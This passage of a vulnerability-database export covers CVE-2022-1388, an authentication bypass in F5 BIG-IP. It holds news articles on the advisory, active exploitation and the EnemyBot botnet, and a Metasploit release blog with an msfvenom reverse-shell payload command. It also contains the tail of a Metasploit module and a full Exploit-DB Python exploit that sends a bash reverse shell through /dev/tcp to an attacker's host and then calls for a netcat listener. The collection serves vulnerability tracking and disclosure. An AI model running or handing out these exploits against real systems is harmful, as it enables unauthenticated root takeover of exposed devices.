'/mgmt/tm/util/bash'),\n 'ctype' => 'application/json',\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'headers' => {\n 'Host' => 'localhost',\n 'Connection' => 'keep-alive, X-F5-Auth-Token',\n 'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6)\n },\n 'data' => {\n 'command' => 'run',\n 'utilCmdArgs' => \"-c '#{bash_cmd}'\"\n }.to_json\n }, datastore['CmdExecTimeout'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], 
"threatpost": [{"lastseen": "2022-05-06T22:45:06", "description": "Application service provider F5 is warning a critical vulnerability allows unauthenticated hackers with network access to execute arbitrary commands on its BIG-IP systems.\n\nThe F5 BIG-IP is a [combination of software and hardware](<https://community.f5.com/t5/technical-articles/what-is-big-ip/ta-p/279398#:~:text=F5's%20BIG%2DIP%20is%20a,delivery%20controller%20and%20security%20products.>) that is designed around access control, application availability and security solutions.\n\n[According to F5](<https://support.f5.com/csp/article/K23605346>), the flaw resides in the representational state transfer (REST) interface for the iControl framework which is used to communicate between the F5 devices and users.\n\nThreat actors can send undisclosed requests and leverage the flaw to bypass the iControl REST authentication and access the F5 BIG-IP systems, an attacker can execute arbitrary commands, create or delete files or disable servers.\n\n\u201cThis vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services,\u201d said F5 in an advisory. 
\u201cThere is no data plane exposure; this is a control plane issue only,\u201d they added.\n\nA self-IP address is an IP address on a BIG-IP system that a customer associates with a VLAN.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/04/f5-releases-security-advisories-addressing-multiple>) and advised users to apply the required updates.\n\n## **Affected Versions**\n\nThe vulnerability affects the following BIG-IP product versions:\n\n * 16.1.0 to 16.1.2\n * 15.1.0 to 15.1.5\n * 14.1.0 to 14.1.4\n * 13.1.0 to 13.1.4\n * 12.1.0 to 12.1.6\n * 11.6.1 to 11.6.5\n\nF5 will not introduce fixes for versions 11.x (11.6.1 \u2013 11.6.5) and 12.x (12.1.0 \u2013 12.1.6).\n\nF5 introduced the patches in versions v17.0.0, v16.1.2.2, v15.1.5.1, v14.1.4.6, and v13.1.5.\n\nThe F5 advisory clarifies that CVE-2022-1388 has no effect on other F5 products \u2013 BIG-IQ Centralized Management, F5OS-A, F5OS-C, or Traffic SDC.\n\nF5 affected products and fixed versions (Source: F5)\n\nBecause BIG-IP devices are commonly integrated into enterprise networks, there is a significant threat of widespread attack.\n\nSecurity researcher Nate Warfield reported in a [tweet](<https://twitter.com/n0x08/status/1521921249596768256?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1521921249596768256%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Ff5-warns-of-critical-big-ip-rce-bug-allowing-device-takeover%2F>) that nearly 16,000 BIG-IP devices are exposed to the internet. A query shared by Warfield shows the exposed devices on [Shodan](<https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22>).\n\nMost of the exposed BIG-IP devices are located in the USA, China, India, and Australia. 
These systems are allocated to Microsoft corporation, Google LLC, DigitalOcean, and Linode.\n\n## **Mitigations**\n\nThree \u201ctemporary mitigation\u201d methods were advised by F5, for those who can\u2019t deploy security patches immediately.\n\nAccording to F5 \u201cYou can[ block all access to the iControl REST interface](<https://support.f5.com/csp/article/K23605346#proc1>) of your BIG-IP system through self IP addresses\u201d. This can be done by changing the Port Lockdown settings to Allow None for each self-IP address in the system.\n\nAnother mitigation method is to[ restrict iControl REST access](<https://support.f5.com/csp/article/K23605346#proc2>) through the management interface or modify the [BIG-IP httpd configuration](<https://support.f5.com/csp/article/K23605346#proc3>).\n\nAdditionally, F5 has also released a more [generic advisory](<https://support.f5.com/csp/article/K55879220>) to tackle another set of 17 high severity vulnerabilities discovered and fixed in BIG-IP.\n\nIn July 2020, a [critical RCE bug](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>) left thousands of F5 BIG-IP users\u2019 accounts vulnerable to an attacker.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T12:48:08", "type": "threatpost", "title": "F5 Warns of Critical Bug Allowing Remote Code Execution in BIG-IP Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-05T12:48:08", "id": "THREATPOST:3118E6C785806679DF205606435B79C7", "href": "https://threatpost.com/f5-critical-bugbig-ip-systems/179514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-10T14:33:54", "description": "Threat actors have started exploiting a critical bug in the application service provider F5\u2019s BIG-IP modules after a working exploit of the vulnerability was publicly made available.\n\nThe critical vulnerability, tracked as [CVE-2020-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>), allows unauthenticated attackers to launch \u201carbitrary system commands, create or delete files, or disable services\u201d on its BIG-IP systems.\n\nThose [patches and mitigation methods](<https://support.f5.com/csp/article/K23605346>), released by F5, mitigate vulnerable BIG-IP iControl modules tied to the representational state transfer (REST) authentication component. 
If left unpatched, a hacker can exploit weaknesses to execute commands with root system privileges.\n\n\u201cThis issue allows attackers with access to the management interface to basically pretend to be an administrator due to a flaw in how the authentication is implemented,\u201d said Aaron Portnoy, director of research and development, Randori.\n\n\u201cOnce you are an admin, you can interact with all the endpoints the application provides, including execute code\u201d Portnoy added.\n\nA Shodan query shared by security researcher [Jacob Baines](<https://twitter.com/Junior_Baines/status/1522205355287228416>) revealed thousands of exposed BIG-IP systems on the internet, which an attacker can exploit remotely.\n\n## **Actively Exploited**\n\nIn the past 24 hours, security researchers announced that they had created a working exploit for the vulnerability, and images related to [proof-of-exploit code](<https://twitter.com/AnnaViolet20/status/1523564632140509184?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1523564632140509184%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Farstechnica.com%2Finformation-technology%2F2022%2F05%2Fhackers-are-actively-exploiting-big-ip-vulnerability-with-a-9-8-severity-rating%2F>) for CVE-2020-1388 started flooding [Twitter](<https://twitter.com/search?q=CVE-2022-1388&src=typed_query&f=top>).\n\nThe exploits are publicly available, and security researchers show how hackers can use the exploit by sending just two commands and some headers to target and access an F5 application endpoint named \u201cbash\u201d which is exposed to the internet.\n\nThe function of this endpoint is to provide an interface for running user-supplied input as a bash command with root privileges.\n\nGerm\u00e1n Fern\u00e1ndez, a security researcher at Cronup, [revealed that hackers are dropping PHP webshells](<https://twitter.com/1ZRR4H/status/1523572874061422593>) to \u201c/tmp/f5.sh\u201d and installing them to 
\u201c/usr/local/www/xui/common/css/\u201d. Attacks show the threat actors using the addresses 216[.]162.206[.]213 and 209[.]127.252[.]207 for dropping the payload. The payload is executed and removed from the system after installation.\n\nThe exploit can also work when [no password is supplied](<https://twitter.com/wdormann/status/1523713803602788352>), as disclosed by Will Dormann, vulnerability analyst at the CERT/CC.\n\nSome of the exploitation attempts did not target the management interface, as observed by [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1523223763747483648>), who added that \u201cIf you configured F5 box as a load balancer and firewall via self IP it is also vulnerable so this may get messy.\u201d\n\nThe ease of exploitation and the name of the vulnerable endpoint, \u2018bash\u2019, which is also the name of a popular Linux shell, have raised suspicion among security researchers, who believe it did not end up in the product by mistake.\n\n\u201cThe CVE-2022-1388 vulnerability is surely an honest mistake by an F5 developer, right?\u201d added researcher [Will Dormann](<https://twitter.com/wdormann/status/1523638101796564993>).\n\n\u201cI\u2019m not entirely unconvinced that this code wasn\u2019t planted by a developer performing corporate espionage for an incident response firm as some sort of revenue guarantee scheme,\u201d said Jake Williams, a vulnerability analyst at the CERT/CC in a [tweet](<https://twitter.com/malwarejake/status/1523634017178124288>).\n\n## **Apply Patches Immediately**\n\nAdministrators are advised to strictly follow the guidelines and install the available patches immediately, as well as remove access to the management interface over the public internet.\n\n * [Block all access to the iControl REST interface](<https://support.f5.com/csp/article/K23605346#proc1>)\n * [Restrict iControl REST access](<https://support.f5.com/csp/article/K23605346#proc2>)\n * [Modify BIG-IP httpd 
configuration](<https://support.f5.com/csp/article/K23605346#proc3>)\n\nF5 has released a [detailed advisory](<https://support.f5.com/csp/article/K23605346>) with all the patches and mitigations, and the researcher at Randori attack surface management released the [Bash code](<https://www.randori.com/blog/vulnerability-analysis-cve-2022-1388/>) that helps to determine whether an instance is exploitable through CVE-2020-1388 or not.\n\nReported By: Sagar Tiwari, an independent security researcher and technical writer.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T12:35:15", "type": "threatpost", "title": "Hackers Actively Exploit F5 BIG-IP Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1388", "CVE-2022-1388"], "modified": "2022-05-10T12:35:15", "id": "THREATPOST:547711F4B3BD7FF6F94D605387B3DD50", "href": "https://threatpost.com/exploit-f5-big-ip-bug/179563/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T12:26:24", "description": "A rapidly evolving IoT malware dubbed \u201cEnemyBot\u201d is targeting content management systems 
(CMS), web servers and Android devices. Threat actor group \u201cKeksec\u201d is believed to be behind the distribution of the malware, according to researchers.\n\n\u201cServices such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,\u201d reported [AT&T Alien Labs](<https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers>) in a recent post. \u201cThe malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,\u201d they added.\n\n## **EnemyBot Working**\n\nThe Alien Labs research team\u2019s study found four main sections in the malware.\n\nThe first section is a Python script, \u2018cc7.py\u2019, used to download all dependencies and compile the malware for different OS architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a batch file \u201cupdate.sh\u201d is created and used to spread the malware to vulnerable targets.\n\nThe second section is the main botnet source code, which includes all the other functionality of the malware excluding the main part and incorporates source code from the various botnets that can combine to perform an attack.\n\nThe third module is the obfuscation segment \u201chide.c\u201d, which is compiled and executed manually to encode/decode the malware strings. 
A simple swap table is used to hide strings and \u201ceach char is replaced with a corresponding char in the table\u201d according to researchers.\n\nThe last segment includes a command-and-control (CC) component to receive vital actions and payloads from attackers.\n\nFurther analysis by AT&T researchers revealed a new scanner function to hunt vulnerable IP addresses and an \u201cadb_infect\u201d function that is used to attack Android devices.\n\nADB, or Android Debug Bridge, is a command-line tool that allows you to communicate with a device.\n\n\u201cIn case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing shell command,\u201d said the researcher.\n\n\u201cKeksec\u2019s EnemyBot appears to be just starting to spread, however due to the authors\u2019 rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,\u201d the researchers added.\n\nThis Linux-based botnet EnemyBot was first discovered by [Securonix](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>) in March 2022, and later in-depth analysis was done by [Fortinet](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>).\n\n## **Vulnerabilities Currently Exploited by EnemyBot**\n\nThe AT&T researchers released a list of vulnerabilities that are currently exploited by EnemyBot; some of them have not been assigned a CVE yet.\n\nThe list includes the [Log4shell vulnerability](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)), [F5 BIG IP](<https://threatpost.com/exploit-f5-big-ip-bug/179563/>) devices ([CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>)), and others. 
Some of the vulnerabilities, such as those in PHP Scriptcase and Adobe ColdFusion 11, have not been assigned a CVE yet.\n\n * [Log4shell](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) vulnerability \u2013 [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)\n * [F5 BIG IP](<https://threatpost.com/exploit-f5-big-ip-bug/179563/>) devices \u2013 [CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>)\n * Spring Cloud Gateway \u2013 [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)\n * TOTOLink A3000RU wireless router \u2013 [CVE-2022-25075](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25075>)\n * Kramer VIAWare \u2013 [CVE-2021-35064](<https://nvd.nist.gov/vuln/detail/CVE-2021-35064>)\n\n\u201cThis indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread,\u201d the researcher explained.\n\n## **Recommended Actions**\n\nThe Alien Labs researcher suggests methods to protect against exploitation. Users are advised to use a properly configured firewall and focus on reducing the exposure of Linux servers and IoT devices to the internet.\n\nAnother recommended action is to monitor network traffic, scan outbound ports and look for suspicious bandwidth usage. 
Software should be updated automatically and patched with the latest security update.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-31T12:24:44", "type": "threatpost", "title": "EnemyBot Malware Targets Web Servers, CMS Tools and Android OS", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35064", "CVE-2021-44228", "CVE-2021-45046", "CVE-2022-1388", "CVE-2022-22947", "CVE-2022-25075"], "modified": "2022-05-31T12:24:44", "id": "THREATPOST:F12423DD382283B0E48D4852237679FC", "href": "https://threatpost.com/enemybot-malware-targets-web-servers-cms-tools-and-android-os/179765/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-12T12:22:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "exploitdb", "title": "F5 BIG-IP 16.0.x - Remote Code Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-1388", "CVE-2022-1388"], "modified": "2022-05-12T00:00:00", "id": "EDB-ID:50932", "href": "https://www.exploit-db.com/exploits/50932", "sourceData": "# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)\r\n# Exploit Author: Yesith Alvarez\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: 16.0.x \r\n# CVE : CVE-2022-1388\r\n\r\nfrom requests import Request, Session\r\nimport sys\r\nimport json\r\n\r\n\r\n\r\ndef title():\r\n print('''\r\n \r\n _______ ________ ___ ___ ___ ___ __ ____ ___ ___ \r\n / ____\\ \\ / / ____| |__ \\ / _ \\__ \\|__ \\ /_ |___ \\ / _ \\ / _ \\ \r\n | | \\ \\ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) |\r\n | | \\ \\/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < \r\n | |____ \\ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) |\r\n \\_____| \\/ |______| |____|\\___/____|____| |_|____/ \\___/ \\___/ \r\n \r\n \r\n \r\nAuthor: Yesith Alvarez\r\nGithub: https://github.com/yealvarez\r\nLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/\r\n ''') \r\n\r\ndef exploit(url, lhost, lport):\r\n\turl = url + 'mgmt/tm/util/bash'\r\n\tdata = {\r\n\t\t\"command\":\"run\",\r\n\t\t\"utilCmdArgs\":\"-c 'bash -i >& /dev/tcp/\"+lhost+\"/\"+lport+\" 0>&1'\"\r\n\t\t\r\n\t}\r\n\theaders = 
{\r\n\t\t'Authorization': 'Basic YWRtaW46',\t\t\r\n\t\t'Connection':'keep-alive, X-F5-Auth-Token',\r\n\t\t'X-F5-Auth-Token': '0'\r\n\r\n\t}\r\n\ts = Session()\r\n\treq = Request('POST', url, json=data, headers=headers)\r\n\tprepped = req.prepare()\r\n\tdel prepped.headers['Content-Type']\r\n\tresp = s.send(prepped,\r\n\t verify=False,\r\n\t timeout=15\r\n\t)\r\n\t#print(prepped.headers)\r\n\t#print(url)\r\n\t#print(resp.headers)\r\n\t#print(resp.json())\r\n\tprint(resp.status_code)\r\n\r\n\r\nif __name__ == '__main__':\r\n title()\r\n if(len(sys.argv) < 4):\r\n \tprint('[+] USAGE: python3 %s https://<target_url> lhost lport\\n'%(sys.argv[0]))\r\n \tprint('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\\n'%(sys.argv[0]))\r\n \tprint('[+] Do not forget to run the listener: nc -lvp 4444\\n')\r\n \texit(0)\r\n else:\r\n \texploit(sys.argv[1],sys.argv[2],sys.argv[3])", "sourceHref": "https://www.exploit-db.com/download/50932", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-05-13T17:31:10", "description": "## Spring4Shell module\n\n\n\nCommunity contributor [vleminator](<https://github.com/vleminator>) added [a new module](<https://github.com/rapid7/metasploit-framework/pull/16423>) which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>)\u2014more commonly known as "Spring4Shell." 
[Depending on its deployment configuration](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965/rapid7-analysis?referrer=blog>), Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.\n\n## F5 BIG-IP iControl RCE via REST Authentication Bypass module\n\nIn addition, we have [a new module](<https://github.com/rapid7/metasploit-framework/pull/16549>) that targets F5 iControl and exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>), from contributor [heyder](<https://github.com/heyder>). This vulnerability allows attackers to bypass iControl's REST authentication on [affected versions](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis?referrer=blog>) and achieve unauthenticated remote code execution as `root` via the `/mgmt/tm/util/bash` endpoint.\n\n## Cisco RV340 SSL VPN RCE module\n\nThe last of the new RCE modules this week\u2014community contributor [pedrib](<https://github.com/pedrib>) added [a Cisco RV340 SSL VPN module](<https://github.com/rapid7/metasploit-framework/pull/16169>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>). This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.\n\n## First Class PowerShell Command Payloads\n\nMetasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. 
Now module authors can just define the standard command target, and users can select one of the new `cmd/windows/powershell*` payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.\n\nSince these are new payload modules, they can also be generated directly using MSFVenom:\n \n \n ./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128\n \n\nThis is similar to using one of the `psh-` formatters with the existing `-f` option. However, because it\u2019s a payload module, the additional [Powershell specific options](<https://github.com/rapid7/metasploit-framework/blob/93a7ae26a1e85f82de8647460a0c245bf95e6b00/lib/msf/core/exploit/powershell.rb#L10>) are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting `Powershell::encode_final_payload=true`.\n\n## New module content (4)\n\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>) \\- A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. 
This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [Cisco RV340 SSL VPN RCE](<https://github.com/rapid7/metasploit-framework/pull/16169>) from [pedrib](<https://github.com/pedrib>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>) \\- A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the `root` user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.\n * [Spring Framework Class property RCE (Spring4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16423>) by [vleminator](<https://github.com/vleminator>), which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>) \\- This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a `war` file, though it may be possible to bypass these limitations later.\n * [Powershell Command Adapter](<https://github.com/rapid7/metasploit-framework/pull/16548>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.\n\n## Enhancements and features (4)\n\n * [#16529](<https://github.com/rapid7/metasploit-framework/pull/16529>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. 
For example within msfconsole:\n \n \n use osx/x64/meterpreter_reverse_tcp\n generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'\n to_handler\n \n\n * [#16538](<https://github.com/rapid7/metasploit-framework/pull/16538>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.\n * [#16551](<https://github.com/rapid7/metasploit-framework/pull/16551>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.\n * [#16553](<https://github.com/rapid7/metasploit-framework/pull/16553>) from [mauvehed](<https://github.com/mauvehed>) \\- This updates Metasploit's `.github/SECURITY.md` file with the latest steps to follow when raising security issues with Rapid7's open source projects.\n\n## Bugs fixed (8)\n\n * [#16485](<https://github.com/rapid7/metasploit-framework/pull/16485>) from [jeffmcjunkin](<https://github.com/jeffmcjunkin>) \\- This updates the version check for the `exploit/windows/local/s4u_persistence` module to allow it to run on later Windows versions.\n * [#16491](<https://github.com/rapid7/metasploit-framework/pull/16491>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.\n * [#16531](<https://github.com/rapid7/metasploit-framework/pull/16531>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in various pihole modules when login authentication is required.\n * [#16533](<https://github.com/rapid7/metasploit-framework/pull/16533>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This updates the 
Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with `-w 32` or `-w 64` \\- previously these flag values were unintentionally ignored.\n * [#16540](<https://github.com/rapid7/metasploit-framework/pull/16540>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.\n * [#16542](<https://github.com/rapid7/metasploit-framework/pull/16542>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes a bug in msfconsole's internal bookkeeping to ensure that closed channels are no longer tracked.\n * [#16544](<https://github.com/rapid7/metasploit-framework/pull/16544>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates post module `windows/gather/ad_to_sqlite` to no longer crash. The module will now additionally store the extracted information as loot.\n * [#16560](<https://github.com/rapid7/metasploit-framework/pull/16560>) from [Ronni3X](<https://github.com/Ronni3X>) \\- This updates the `nessus_connect` login functionality to correctly handle the `@` symbol being present in the password.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-05T11%3A16%3A04-05%3A00..2022-05-12T07%3A30%3A04-05%3A00%22>)\n * [Full diff 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/compare/6.1.41...6.1.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
